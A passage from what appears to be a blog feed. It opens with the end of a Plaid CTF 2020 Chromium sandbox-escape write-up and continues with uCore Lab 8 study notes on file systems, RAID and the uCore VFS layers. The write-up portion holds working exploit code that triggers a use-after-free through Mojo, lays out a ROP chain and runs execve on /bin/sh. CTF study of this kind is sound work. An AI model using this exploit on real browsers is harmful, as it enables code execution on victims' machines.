function_">dec2hex</span>(syscall_addr));</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// Preallocate 0xc28 bytes</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> buf = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0xc28</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// View the same buffer as an array of 64-bit integers (the underlying memory is unchanged)</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> uaf_buf = <span class="keyword">new</span> <span class="title class_">BigUint64Array</span>(buf);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">/* Start laying out the gadgets.</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                   First set the first 8 bytes of the corresponding vtable entry to childRenderFrameHost+0x10,</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                   so that at the crash $rax is guaranteed to equal this value. */</span></span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">0</span>] = <span class="title class_">BigInt</span>(childRenderFrameHost + <span class="number">0x10</span>);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">3</span>] = <span class="title class_">BigInt</span>(pop_rdi_ret);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">4</span>] = <span class="title class_">BigInt</span>(childRenderFrameHost + <span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">0x8</span>);</span></span><br><span class="line"><span class="language-javascript">           
     uaf_buf[<span class="number">5</span>] = <span class="title class_">BigInt</span>(pop_rsi_ret);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">6</span>] = <span class="title class_">BigInt</span>(<span class="number">0</span>);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">7</span>] = <span class="title class_">BigInt</span>(pop_rdx_ret);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">8</span>] = <span class="title class_">BigInt</span>(<span class="number">0</span>);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">9</span>] = <span class="title class_">BigInt</span>(pop_rax_ret);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">10</span>] = <span class="title class_">BigInt</span>(<span class="number">59</span>);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">11</span>] = <span class="title class_">BigInt</span>(syscall_addr);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[(<span class="number">0x160</span> + <span class="number">0x10</span>) / <span class="number">0x8</span>] = <span class="title class_">BigInt</span>(xchg_addr);</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> uaf_uint8 = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(buf); <span class="comment">// /bin/sh\x00</span></span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">0</span>] = 
<span class="number">0x2f</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">1</span>] = <span class="number">0x62</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">2</span>] = <span class="number">0x69</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">3</span>] = <span class="number">0x6e</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">4</span>] = <span class="number">0x2f</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">5</span>] = <span class="number">0x73</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">6</span>] = <span class="number">0x68</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">7</span>] = <span class="number">0x00</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span 
class="line"><span class="language-javascript">                <span class="comment">// Create a PlaidStoreImpl instance in the parent frame</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> parentPlaidStorePtr = <span class="keyword">new</span> blink.<span class="property">mojom</span>.<span class="title class_">PlaidStorePtr</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="title class_">Mojo</span>.<span class="title function_">bindInterface</span>(</span></span><br><span class="line"><span class="language-javascript">                    blink.<span class="property">mojom</span>.<span class="property">PlaidStore</span>.<span class="property">name</span>,</span></span><br><span class="line"><span class="language-javascript">                    mojo.<span class="title function_">makeRequest</span>(parentPlaidStorePtr).<span class="property">handle</span>,</span></span><br><span class="line"><span class="language-javascript">                    <span class="string">&quot;context&quot;</span>,</span></span><br><span class="line"><span class="language-javascript">                    <span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// Free the child iframe</span></span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">removeChild</span>(frame);</span></span><br><span class="line"><span class="language-javascript">                frame.<span class="title function_">remove</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// Allocate a large amount of memory to occupy the freed region.</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">for</span> 
(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">100</span>; i++)</span></span><br><span class="line"><span class="language-javascript">                    <span class="comment">// Note that the storeData key must change on every iteration; otherwise each call would keep refilling the same memory region.</span></span></span><br><span class="line"><span class="language-javascript">                    parentPlaidStorePtr.<span class="title function_">storeData</span>(<span class="string">&quot;1&quot;</span> + i, <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(buf));</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// Try to trigger the UAF vulnerability</span></span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;get shell!&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">                childPlaidStorePtr.<span class="title function_">getData</span>(<span class="string">&quot;aaaa&quot;</span>, <span class="number">0x28</span>);</span></span><br><span class="line"><span class="language-javascript">            &#125;);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">pwn()</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><p>The exploit runs and succeeds.</p><p><img 
src="/2020/10/mojo/success.png" alt="img"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;1-简介&quot;&gt;1. Introduction&lt;/h2&gt;
&lt;p&gt;Plaid CTF 2020 &lt;code&gt;mojo&lt;/code&gt; is a basic Chromium sandbox escape challenge and a good starting point for learning &lt;code&gt;chrome&lt;/code&gt; exploitation.&lt;/p&gt;
&lt;p&gt;Challenge source - &lt;a href=&quot;https://ctftime.org/task/11314&quot;&gt;ctftime - task11314&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/chrome/"/>
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="chrome" scheme="https://kiprey.github.io/tags/chrome/"/>
    
    <category term="sandbox escape" scheme="https://kiprey.github.io/tags/sandbox-escape/"/>
    
  </entry>
  
  <entry>
    <title>uCore Labs - Lab8</title>
    <link href="https://kiprey.github.io/2020/09/uCore-8/"/>
    <id>https://kiprey.github.io/2020/09/uCore-8/</id>
    <published>2020-09-27T09:35:38.000Z</published>
    <updated>2025-11-24T03:59:40.156Z</updated>
    
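    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>These are notes I wrote while completing <code>uCore</code> Lab 8.</li><li>They cover parts of the implementation of the file system and the I/O subsystem.</li><li>There is a lot of material, so using the navigation bar on the right is recommended.</li></ul><span id="more"></span><h2 id="知识点">Key Concepts</h2><h3 id="1-文件系统和文件">1. File Systems and Files</h3><ul><li><p><strong>A file system is the operating-system subsystem that manages persistent data and provides data storage and access</strong></p><ul><li>Organizes, retrieves, reads, and writes data</li><li>Most computer systems have a file system</li><li>In a broad sense, Google is also a file system</li></ul></li><li><p><strong>A file is a collection of data items that has a symbolic name and consists of a sequence of bytes</strong></p><ul><li>The basic unit of data in a file system</li><li>The file name is the file's identifier</li></ul></li><li><p>Functions of a file system</p><ul><li><strong>Allocating disk space for files</strong><ul><li>Managing file blocks (location and order)</li><li>Managing free space (location)</li><li>Allocation algorithms (policy)</li></ul></li><li><strong>Managing the set of files</strong><ul><li>Locating: files and their contents</li><li>Naming: finding a file by name</li><li>File system structure: how files are organized</li></ul></li><li><strong>Data reliability and security</strong><ul><li>Security: protecting data at multiple levels</li><li>Reliability<ul><li>Storing files persistently</li><li>Guarding against system crashes, media errors, attacks, and so on</li></ul></li></ul></li></ul></li><li><p>File attributes</p><ul><li><p>Name, type, size, location, protection, creator, creation time, last-modified time</p></li><li><p>File header: the information about a file kept in the file system's metadata</p><ul><li>File attributes</li><li>Location and order of the file's storage blocks</li></ul></li></ul></li></ul><h3 id="2-文件描述符">2. 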
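File Descriptors</h3><ul><li><p>Opening files and file descriptors</p><ul><li><p><strong>File access model</strong>: a process must “open” a file before accessing its data</p></li><li><p><strong>The kernel tracks</strong> every file a process has open</p><ul><li>The operating system maintains an open-file table for each process</li><li>A file descriptor identifies an open file</li></ul></li></ul></li><li><p>State and information the operating system keeps for each open file in the open-file table</p><ul><li><strong>File pointer</strong><ul><li>Records the position of the most recent read or write</li><li>Each process maintains its own pointer for each file it has open</li></ul></li><li><strong>Open count</strong><ul><li>The number of times the file is currently open</li><li>When the last process closes the file, it is removed from the open-file table</li></ul></li><li><strong>On-disk information about the file</strong>: cached information for accessing its data</li><li><strong>Access rights</strong>: the file access mode of each process</li></ul></li><li><p>The <strong>user view</strong> and the <strong>system view</strong> of a file</p><ul><li><p>The <strong>user view</strong> of a file: a persistent <strong>data structure</strong></p></li><li><p>The system access interface</p><ul><li>A collection of byte sequences (Unix)</li><li>The system does not care about the data structures stored on disk</li></ul></li><li><p>The operating system's <strong>view of a file</strong></p><ul><li>A collection of data blocks</li><li>A data block is the logical unit of operation, whereas a sector is the physical unit of storage</li><li>The block size is generally <strong>not equal to</strong> the sector size</li></ul></li><li><p>Translating from the user view to the system view</p><ul><li>When a process reads a file: fetch the data block containing the requested bytes and return the relevant part of the block</li><li>When a process writes a file: fetch the data block, modify the relevant part, and write the block back</li></ul><blockquote><p><strong>The basic unit of operation in a file system is the data block</strong>.</p></blockquote></li></ul></li><li><p><strong>Access patterns</strong></p><ul><li>The operating system needs to know how processes access files</li><li><strong>Sequential</strong> access: bytes are read in order. Most file accesses are sequential reads.</li><li><strong>Random</strong> access: reading and writing from the middle of the file. Less common but still important, for example when virtual memory stores memory pages in a file</li><li><strong>Indexed</strong> access: locating data through an index built on features of the data, as a database does.<ul><li>Operating systems usually do not provide full indexed access</li><li>Databases are built on indexed access to content on disk</li></ul></li></ul></li><li><p><strong>Internal file structure</strong></p><ul><li>Unstructured: a sequence of words or bytes</li><li>Simple record structure: columns, fixed-length, variable-length</li><li>Complex structure: formatted documents, executable files, …</li></ul></li><li><p><strong>File sharing and access control</strong></p><ul><li>File sharing is very important on <strong>multi-user</strong> systems</li><li>Access control<ul><li>Which access rights each user can obtain on which files</li><li>Access modes: read, write, execute, delete, list, and so on</li></ul></li><li>File access control list (ACL): 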
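&lt;file entity, permissions&gt;</li><li>The Unix model<ul><li>&lt;user|group|everyone, read|write|execute&gt;</li><li>User ID: identifies the user and indicates the permissions and protection mode granted to each user</li><li>Group ID: lets users be organized into groups and specifies the group's access rights</li></ul></li></ul></li><li><p><strong>Consistency semantics</strong></p><ul><li><strong>Specify how multiple processes access a shared file at the same time</strong><ul><li>Similar to synchronization algorithms</li><li>Kept simple by design because of disk I/O and network latency</li></ul></li><li>Unix file system (UFS) semantics<ul><li>Writes to an open file are immediately visible to other users who have the same file open</li><li>A shared file pointer allows multiple users to read and write the file at the same time</li></ul></li><li>Session semantics: writes become visible only when the file is closed</li><li>Read-write locks: some operating systems and file systems provide them</li></ul></li></ul><h3 id="3-目录、文件别名和文件系统种类">3. Directories, File Aliases, and Types of File Systems</h3><ul><li><p><strong>Hierarchical file systems</strong></p><ul><li><p>Files are organized into directories</p></li><li><p><strong>A directory is a special kind of file</strong>: its content is a file index table of <strong>&lt;file|pointer to the file&gt;</strong> entries</p></li><li><p>The <strong>tree structure</strong> of directories and files (early file systems were flat)</p><p><img src="/2020/09/uCore-8/directoryTree.png" alt="img"></p></li></ul></li><li><p><strong>Directory operations</strong></p><ul><li>Typical directory operations<ul><li>Searching for, creating, and deleting files</li><li>Listing a directory, renaming, and traversing a path</li></ul></li><li>The operating system should allow only the kernel to modify directories<ul><li>This ensures the integrity of the mapping</li><li>Applications access directories through system calls</li></ul></li></ul></li><li><p><strong>Directory implementation</strong></p><ul><li>A linear list of file names, each with a pointer to the data blocks.<ul><li>Simple to program</li><li>Slow to execute.</li></ul></li><li>Hash table: a linear list with a hash data structure<ul><li>Reduces directory search time</li><li>Collisions: two file names hash to the same value</li><li>Fixed size</li></ul></li></ul></li><li><p><strong>File aliases</strong></p><blockquote><p>Two or more file names refer to the same file</p></blockquote><ul><li><p>Hard link: multiple directory entries point to one file</p></li><li><p>Soft link: points to another file in the manner of a “shortcut”</p><blockquote><p>Implemented by storing the logical name of the real file.</p></blockquote></li></ul><p><img src="/2020/09/uCore-8/file_rename.png" alt="img"></p></li><li><p><strong>Cycles in the directory structure</strong></p><ul><li>How to guarantee there are no cycles<ul><li>Allow links only to files, not to subdirectories</li><li>When a link is added, run a cycle-detection algorithm to decide whether it is acceptable</li></ul></li><li>More common in practice: <strong>limit the number of directories a path may traverse</strong></li></ul><p><img src="/2020/09/uCore-8/directoryLoop.png" 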
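alt="img"></p></li><li><p><strong>Name resolution (path traversal)</strong></p><ul><li>Name resolution: translating a logical name into a physical resource (such as a file)<ul><li>Use the path name to find the file's actual location in the file system</li><li>Traverse directories until the target file is found</li></ul></li><li>Example: resolving <code>/bin/sh</code><ul><li>Read the file header of the root directory (at a fixed location on disk)</li><li>Read the root directory's data blocks and search for the <code>bin</code> entry</li><li>Read the file header of <code>bin</code></li><li>Read the data blocks of <code>bin</code> and search for the <code>sh</code> entry</li><li>Read the file header of <code>sh</code></li></ul></li><li>Current working directory (PWD)<ul><li>Each process points to a directory that is used to resolve file names</li><li>Lets users specify relative paths instead of absolute paths</li></ul></li></ul></li><li><p>Mounting a file system</p><ul><li>A file system must be mounted before it can be accessed</li><li>An unmounted file system is attached at a mount point</li></ul></li><li><p><strong>Types of file systems</strong></p><ul><li>Disk file systems: files are stored on a data storage device such as a disk. Examples: FAT, NTFS, ext2/3, ISO9660, and so on</li><li>Database file systems: files are addressable by their attributes, for example WinFS</li><li>Journaling file systems: record the modifications made to the file system</li><li>Special/virtual file systems</li><li>Network/distributed file systems<ul><li>Files can be shared over a network<ul><li>The files reside on a remote server</li><li>Clients mount the server's file system remotely</li><li>Standard file-access system calls are translated into remote accesses</li><li>Standard file-sharing protocols: NFS for Unix, CIFS for Windows.</li></ul></li><li>Challenges of distributed file systems<ul><li>Identifying clients and the users on them is complicated</li><li><strong>Consistency</strong> problems</li><li><strong>Error-handling models</strong></li></ul></li></ul></li></ul></li></ul><h3 id="4-虚拟文件系统">4. 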
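Virtual File System</h3><ul><li><p>File system implementation: <strong>a layered structure</strong></p><ul><li>Virtual (logical) file system (VFS, Virtual File System)</li><li>Specific file system modules</li></ul></li><li><p><strong>Virtual file system (VFS)</strong></p><ul><li>Purpose: an abstraction over all the different file systems</li><li>Functions:<ul><li>Provide a uniform file and file system <strong>interface</strong></li><li>Manage the <strong>data structures</strong> associated with all files and file systems</li><li>Efficient lookup <strong>routines</strong> for traversing the file system</li><li><strong>Interaction</strong> with the specific file system modules</li></ul></li></ul></li><li><p><strong>Basic file system data structures</strong></p><ul><li>Volume control block (Unix: <code>superblock</code>)<ul><li>One per file system</li><li>Detailed information about the file system</li><li>Blocks, block size, free blocks, counts/pointers, and so on</li></ul></li><li>File control block (Unix: <code>vnode</code> or <code>inode</code>)<ul><li>One per file</li><li>Detailed information about the file</li><li>Access permissions, owner, size, data block locations, and so on</li></ul></li><li>Directory entry (Linux: <code>dentry</code>)<ul><li>One per directory entry (directories and files)</li><li>Encodes the directory entries and their tree layout as a tree data structure</li><li>Points to the file control block, parent directory, subdirectories, and so on</li></ul></li></ul></li><li><p><strong>File system storage structure</strong></p><ul><li>File system data structures: <strong>volume control block, file control blocks, directory nodes</strong></li><li>Stored persistently in secondary storage, in the data blocks of the storage device</li><li>Loaded into memory when needed<ul><li>Volume control block: loaded when the file system is mounted</li><li>File control block: loaded when the file is accessed</li><li>Directory node: loaded while a file path is being traversed</li></ul></li></ul></li></ul><h3 id="5-文件缓存和打开文件">5. 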
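File Caching and Open Files</h3><ul><li><p>Data block caching</p><ul><li>Data blocks are read into memory on demand<ul><li>Provides the read() operation</li><li>Read-ahead: fetch the following data blocks in advance</li></ul></li><li>Data blocks are cached after use<ul><li>On the assumption that the data will be used again</li><li>Writes may be buffered and written back later</li></ul></li><li>Two ways to cache data blocks<ul><li>Data block cache</li><li>Page cache: a unified cache for data blocks and memory pages</li></ul></li></ul></li><li><p>Page cache</p><ul><li><strong>Virtual paged memory</strong>: a virtual page in the virtual address space can be mapped to a file in local secondary storage</li><li><strong>Page cache for file data blocks</strong><ul><li>File data blocks are mapped to pages in virtual memory</li><li>File reads and writes are turned into memory accesses</li><li>This may cause page faults or mark pages dirty</li><li><strong>Open problem: the page replacement algorithm has to balance the number of pages between virtual memory and the page cache</strong></li></ul></li></ul></li><li><p>Data structures for open files in the file system</p><ul><li>File descriptor<ul><li>Every open file has a file descriptor</li><li>File state information: directory entry, current file pointer, file operation settings, and so on</li></ul></li><li>Open file table<ul><li>Each process has its own <strong>per-process open file table</strong></li><li>One system-wide open file table</li><li>A volume cannot be unmounted while any of its files is open</li></ul></li></ul></li><li><p>Open file locks</p><blockquote><p>Some file systems provide file locks to coordinate file access among multiple processes</p></blockquote><ul><li><strong>Mandatory</strong>: access is denied or granted according to the locks held and the access requested</li><li><strong>Advisory</strong>: a process can check the state of the lock and decide what to do</li></ul></li></ul><h3 id="6-文件分配">6. File Allocation</h3><ul><li>File sizes<ul><li>Most files are small<ul><li>Small files need to be supported well</li><li>The block size must not be too large</li></ul></li><li>Some files are very large<ul><li>Large files must be supported (64-bit file offsets)</li><li>Access to large files needs to be efficient</li></ul></li></ul></li><li>File allocation<ul><li>How to represent the location and order of the data blocks allocated to a file</li><li>Allocation methods: contiguous, linked, and indexed allocation</li><li>Metrics: storage efficiency (external fragmentation, etc.) and read/write performance (access speed, etc.)</li></ul></li></ul><h4 id="a-连续分配">a. Contiguous Allocation</h4><ul><li>The file header specifies the starting block and the length</li><li>Allocation policies: <strong>first fit, best fit</strong></li><li>Advantages: good read performance; <strong>efficient sequential and random access</strong></li><li>Disadvantages:<ul><li><strong>Severe fragmentation!</strong></li><li><strong>How does a file grow?</strong> Preallocate, or allocate on demand?</li></ul></li></ul><h4 id="b-链式分配">b. Linked Allocation</h4><ul><li>The file is stored as a linked list of data blocks</li><li>The file header holds pointers to the first and the last block</li><li>Advantages<ul><li>Creating, growing, and shrinking a file is easy</li><li>No external fragmentation</li></ul></li><li>Disadvantages<ul><li>No true random access</li><li>Poor reliability: if one link is broken, all following data blocks are lost</li></ul></li></ul><h4 id="c-索引分配">c. 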
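Indexed Allocation</h4><ul><li>An <strong>index block</strong> is created for each file; it is a list of pointers to the file's data blocks</li><li>The file header contains the pointer to the index block</li><li>Advantages<ul><li>Creating, growing, and shrinking a file is easy</li><li>No external fragmentation</li><li>Supports direct access</li></ul></li><li>Disadvantages<ul><li>For a small file, the overhead of storing the index is high</li><li>Inconvenient for large files</li></ul></li></ul><h5 id="大文件的索引分配">Indexed Allocation for Large Files</h5><ul><li>Linked index blocks: chain multiple index blocks together as a linked list</li><li>Multilevel index blocks: a first-level index block points to several second-level index blocks, and so on</li></ul><h4 id="d-UFS多级索引分配">d. UFS Multilevel Indexed Allocation</h4><p><img src="/2020/09/uCore-8/UFS_indexSearch.png" alt="img"></p><ul><li>The file header contains 13 pointers<ul><li>The first 10 pointers point to data blocks</li><li>The 11th pointer points to an index block</li><li>The 12th pointer points to a second-level index block</li><li>The 13th pointer points to a third-level index block</li></ul></li><li>Effects<ul><li>Raises the limit on file size</li><li>Data blocks are allocated dynamically, so files are easy to extend</li><li>Low overhead for small files</li><li>Indirect blocks are allocated only for large files; accessing a data block of a large file takes many lookups</li></ul></li></ul><h3 id="7-空闲空间管理">7. Free Space Management</h3><p>Keep track of the unallocated data blocks in a volume</p><blockquote><p>Which data structure should represent the free space list?</p></blockquote><ul><li>Bitmap<ul><li>A bitmap represents the list of free data blocks<ul><li><code>11111110011001001010010101</code></li><li>$D_i = 0$ means that data block $i$ is free; otherwise it is allocated</li></ul></li><li>Simple to use, but the bit vector can be large<ul><li>160 GB disk -&gt; 40M data blocks (assuming 4 KB blocks) -&gt; 5 MB bitmap</li><li>If free space is evenly distributed across the disk, about <strong>total number of disk blocks / number of free blocks</strong> bits must be scanned before a <code>0</code> is found</li></ul></li></ul></li><li>Linked list</li><li>Linked index</li></ul><h3 id="8-冗余磁盘矩阵RAID">8. Redundant Array of Disks (RAID)</h3><h4 id="a-基本概念">a. Basic Concepts</h4><ul><li><p>Disk partitions</p><blockquote><p>Disks are usually partitioned to minimize seek time</p></blockquote><ul><li>A partition is a set of cylinders</li><li>Each partition can be treated as a logically independent disk</li></ul><p><img src="/2020/09/uCore-8/divideArea.png" alt="img"></p></li><li><p>A typical disk file system layout</p><ul><li><p>Volume: a region of secondary storage that holds a complete file system instance, usually residing on a single disk partition</p></li><li><p><img src="/2020/09/uCore-8/diskFileSystem.png" alt="img"></p></li></ul></li><li><p>Managing multiple disks</p><ul><li>Using multiple disks can improve<ul><li>Throughput (through parallelism)</li><li>Reliability and availability (through redundancy)</li></ul></li><li>Redundant array of disks (RAID, Redundant Array of Inexpensive Disks)<ul><li>A family of disk management techniques</li><li>RAID levels: RAID-0, RAID-1, RAID-5</li></ul></li><li>Implementing RAID<ul><li>Software: volume management in the operating system kernel</li><li>Hardware: a RAID hardware controller (I/O)</li></ul></li></ul></li></ul><h4 id="b-RAID-0：磁盘条带化">b. 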
RAID-0: Disk Striping</h4><blockquote><p>Block-based striping</p></blockquote><p>Each data block is split into sub-blocks that are stored on separate disks</p><blockquote><p>Parallel block access across independent disks provides higher disk bandwidth</p></blockquote><p><img src="/2020/09/uCore-8/raid0.png" alt="img"></p><h4 id="c-RAID-1：磁盘镜像">c. RAID-1: Disk Mirroring</h4><p>Write to both disks, read from either one</p><ul><li>Reliability is multiplied</li><li>Read performance scales linearly</li></ul><p><img src="/2020/09/uCore-8/raid1.png" alt="img"></p><h4 id="d-RAID-4：带校验的磁盘条带化">d. RAID-4: Disk Striping with Parity</h4><blockquote><p>Block-based striping</p></blockquote><p>Block-level disk striping plus a dedicated parity disk</p><blockquote><p>Allows recovery from the failure of any single disk</p></blockquote><p><img src="/2020/09/uCore-8/raid4.png" alt="img"></p><h4 id="e-RAID-5：带分布式校验的磁盘条带化">e. RAID-5: Disk Striping with Distributed Parity</h4><blockquote><p>Block-based striping</p></blockquote><p><img src="/2020/09/uCore-8/raid5.png" alt="img"></p><h4 id="f-可纠正多个磁盘错误的冗余磁盘阵列">f. RAID Levels That Tolerate Multiple Disk Failures</h4><ul><li>RAID-5: one parity block per stripe; tolerates one disk failure</li><li>RAID-6: two redundancy blocks per stripe; tolerates two disk failures</li></ul><h4 id="g-RAID嵌套">g. Nested RAID</h4><ul><li><p>RAID 0+1</p><p><img src="/2020/09/uCore-8/raid01.png" alt="img"></p></li><li><p>RAID 1+0</p><p><img src="/2020/09/uCore-8/raid10.png" alt="img"></p></li></ul><h3 id="9-uCore文件系统实现">9. uCore File System Implementation</h3><h4 id="a-uCore文件系统概述">a. 
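uCore File System Overview</h4><p>The software module of an operating system that manages and stores long-lived data is called the file system. This lab focuses on the design and implementation of the file system and on analyzing and understanding its execution flow.</p><p>The ucore file system model derives from the file system of Harvard's OS161 and from the Linux file system, both of which in turn derive from the traditional UNIX file system design. UNIX introduced four file system abstractions: file, directory entry (dentry), index node (inode), and mount point.</p><ul><li><strong>File</strong>: the content of a UNIX file can be understood as an ordered byte buffer. Every file has a name (also called a file path name) by which applications identify it. Typical file operations are read, write, create, and delete.</li><li><strong>Directory entry</strong>: a directory entry is not a directory (also called a file path) but a component of one. In UNIX a directory is treated as a special kind of file, and a directory entry is one part of a file path. For the path name "/test/testfile", the directory entries are the root directory "/", the directory "test", and the file "testfile"; all three are directory entries. In general, a directory entry contains its name (a file name or directory name) and the location of its inode (described below).</li><li><strong>Index node</strong>: UNIX stores a file's metadata (such as access permissions, size, owner, creation time, and the location of the data) in a separate data structure called the index node (inode).</li><li><strong>Mount point</strong>: in UNIX, a file system is mounted at a particular file path, and that location is the mount point. Every mounted file system appears in the system as a leaf of the root file system tree.</li></ul><p>These abstractions form the logical data structures of the UNIX file system. A concrete file system must, through its architecture and implementation, map this information onto the disk and store it there, so that its on-disk layout (the physical organization of data on disk) embodies the abstractions.</p><blockquote><p>For example, file metadata is stored in inodes within disk blocks. When a file is loaded into memory, the kernel uses the on-disk inode to construct the in-memory inode.</p></blockquote><p>ucore follows the UNIX file system design. Its file system architecture consists of four main parts:</p><ul><li><strong>Generic file system access interface layer</strong>: provides a standard interface from user space to the file system, so that applications can obtain the ucore kernel's file system services through a simple interface.</li><li><strong>File system abstraction layer</strong>: upward, it offers a consistent interface to the rest of the kernel (the implementation of the file-related system calls and other kernel modules). Downward, it uses a common table of abstract function pointers and data structures to hide the implementation details of the different file systems.</li><li><strong>Simple FS file system layer</strong>: a simple index-based file system instance. Upward, it implements the abstract functions required by the file system abstraction layer with concrete functions. Downward, it accesses the device interface.</li><li><strong>Device interface layer</strong>: upward, it provides a device access interface that hides hardware differences. Downward, it implements the interfaces to the specific device drivers, such as the disk, serial port, and keyboard device interfaces.</li></ul><p>With these layers in mind, here is a rough outline of how a file system access is handled, to give a better overall picture. When an application operates on a file (open/create/delete/read/write), it first enters the file system through the interface that the generic file system access interface layer exposes to user space. The file system abstraction layer then forwards the request to a specific file system (such as SFS). That file system (the Simple FS layer) translates the application's request into requests on disk blocks and hands them, through the device interface layer, to the disk driver routines, which perform the actual disk operations. Following the complete execution of the user-mode file write function write makes the layering and dependencies of the ucore file system architecture fairly clear.</p><p><img src="https://chyyuu.gitbooks.io/ucore_os_docs/content/lab8_figs/image001.png" alt="image"></p><p><strong>Overall structure of the ucore file system</strong></p><p>Viewed from different angles within the ucore operating system, the file system architecture contains four main kinds of data structures, 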
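namely:</p><ul><li><strong>Superblock</strong>: describes the global information of a particular file system from the viewpoint of the file system as a whole. Its scope is the entire OS.</li><li><strong>Index node (inode)</strong>: describes the attributes of a single file and the location of its data, from the viewpoint of an individual file in the file system. Its scope is the entire OS.</li><li><strong>Directory entry (dentry)</strong>: describes one particular directory entry in a file path, from the viewpoint of file paths in the file system (note: a sequence of directory entries forms a directory/file path). Its scope is the entire OS. For SFS, the inode (specifically struct sfs_disk_inode) corresponds to a concrete object on the physical disk, while the dentry (specifically struct sfs_disk_entry) is an in-memory entity whose ino member refers to the corresponding inode number and whose other member is the file name.</li><li><strong>File</strong>: describes, from the viewpoint of a process, what the process needs to know while accessing a file: the file identifier, the current read/write position, the reference state of the file, and so on. Its scope is a single process.</li></ul><p>When a user process opens a file, the data structures involved in ucore (each is covered in detail in the subsections below) and their relationships are shown in the following figure:</p><p><img src="https://chyyuu.gitbooks.io/ucore_os_docs/content/lab8_figs/image002.png" alt="image"></p><p>Here is a diagram of how the relevant data structures relate to one another</p><blockquote><p>My own drawing was too ugly T_T; this figure comes from <a href="http://www.resery.top/">resery</a></p></blockquote><p><img src="/2020/09/uCore-8/fsStruct.png" alt="img"></p><p>Overall structure of the file system</p><p><img src="/2020/09/uCore-8/total_struct.png" alt="img"></p><p>Let us walk through the structure from top to bottom</p><h4 id="b-文件系统结构">b. File System Structure</h4><h5 id="1-通用文件系统访问接口层">1) Generic File System Access Interface Layer</h5><p>In the kernel, the generic file-related functions are listed below; they are also the functions used most often in uCore.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_open</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path, <span class="type">uint32_t</span> open_flags)</span></span>; 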
